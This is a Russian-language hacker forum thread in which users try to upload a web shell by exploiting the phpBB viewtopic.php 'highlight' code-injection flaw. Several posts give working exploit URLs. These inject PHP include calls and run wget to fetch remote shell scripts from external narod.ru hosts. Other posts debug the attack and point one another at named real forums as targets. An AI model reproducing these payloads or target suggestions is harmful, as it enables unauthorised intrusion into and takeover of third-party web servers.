|
Снова phpBB. Небольшой вопрос…(highlight)
Не получается залить шелл. Я понимаю, что это звучит оооооочень глупо, но я уже не знаю, что делать… я уже все перепробовал… дело в том, что первый раз у меня получилось залить, но получилось не до конца… т.е. только половину файла ). На второй день уже нечего не получается залить… (. У меня настроение упало в несколько раз… сейчас сижу, голову ломаю, и думаю, где я мог проламерится…(… ну вроде все ж правильно…(
Просмотр директории, добавлять полные права, у меня выходит, а вот инклуд, или заливка, полный пи$%ец… viewtopic.php?xxx=wget%20http://zattack.narod.ru/rem.php&t=10&highlight=%2527.include($_GET[xxx]).include.%2527 Ну ЧТО ТУТ НЕПРАВИЛЬНО??? Вить viewtopic.php?xxx=echo%20huitext&t=10&highlight=%2 527.include($_GET[xxx]).include.%2527 срабатывает… ПЛЗ, очень прошу помогите разобраться в этой х%$@e...( |
попробуй так.
http://[Target]/viewtopic.php?p=44&highlight=%2527.$poster=pwd;ls% 20-l;wget%20http://docentattack.narod.ru/p.php |
как стать хацкером?
|
Цитата:
Я прочитал книги: Html; css; Linux; PHP5; Javascript. Почитай =) |
Цитата:
PHP код:
|
Парень, ты наверное немного ошибся:
правильно будет так: Цитата:
расскажи как ты добавляешь полные права... .htaccess правишь что-ли? |
Цитата:
Цитата:
|
у тебя после wget стоит |
|
Цитата:
...=wget%20ht... дык. %20 это ж пробел... Или я что-то не так понял...??? |
Вот вчера ночью заметил еще один вариант…
Решил попробовать… для начала ввел Цитата:
Все, я такой радый, прям как слон, уверен в победе, ввожу Цитата:
Место этого появилось )\b#i . Ну этт вообще нормально??? |
Цитата:
нелегка хакерская доля... Сделали бы школу хацкеров-стопудово народу было бы.... и я б записался... эх,мож кто научит,а мож и сам научусь |
1Народ...мля..я конечно понимаю..но это уже оффтопик...
2Что, некто нечего подсказать не может???? Ну и где же знаменитые модераторы, админы? ) |
я в этом не разбираюсь,вот,зайди завтра мож ответят;а вообще надо типа чата что-нить сделать-я уже предлагал,но...
|
А толку даже если бы чат был?
А школы не будет =) Потому что тогда и хакеров не будет. Вот так же раньше было. Были все неучи, типа, и один чел, его звали Эйнштейн был учёным... Он там всякие вещи наизобретал и народ подумал, а что если школу открыть, может все Эйнштейнами станем. Школу открыли а толку нету. Так же и с хакерской школой будет. Хакерами не становяться - хакерами рождаются!!!!!!!!!!!!! :D |
мля... ну я ж по человечески просил... никаких оффпостов..
|
Вот у меня возник еще один вопрос… эти команды именно для Linux? А если на сервере стоит например FreeBSD? Команды будут те же???
|
Мда... молчание... все внезапно претворились ламерами )
|
Команды практически одинаковы на Linux и FreeBSD процентов на 90. Разница в установленом програмном обеспечении. В стандартной установке FreeBSD нет никаких левых прог. В линуксе в любом дистрибутиве прог довольно много.
Это вкрадце. |
Егорыч+++, будут какие-то идеи или намеки, по поводу #10 вопроса? Жалко вить…
Тут мне подсказывали, найди другой форум… А интерес? Я не понимаю… ломать под известные уязвимости все что попадется под руку? Лично я, не вижу не интереса, не смысла. Я задаю перед собой цель, конечную цель… Не имеет значение сколько на это уйдет время, сколько я буду долбиться об клавиатуру головой, я ее все равно выполню, до конца… |
-SX- как ты загнул шелл?У меня нах не получается,все команды тоже пишет:
Warning: shell_exec() has been disabled for security reasons in /disk2/clients/a1673/mytischi.com/htdocs/phpbb/viewtopic.php(1104) : regexp code on line 1 Будешь любезен,можешь попробовать сам здесь http://www.mytischi.com/phpbb Если получится дай команду,которой запускал |
Megaladon нечего ты там не сделаешь... Сверху слева видешь, что написано? )
и + к тому Warning: shell_exec() has been disabled for security reasons |
Что это значит?
|
А это кабы он переехал?Да?
|
yну можешь попробовать этот?
http://www.taekwon-do.ru/forum |
Megaladon oбрати внимание на версию форума…
|
Наконец залил… )
Кому интересно как, см. новость "phpBB Хоть и старьё!!!" =) Пример Цитата:
|
| Время: 12:43 |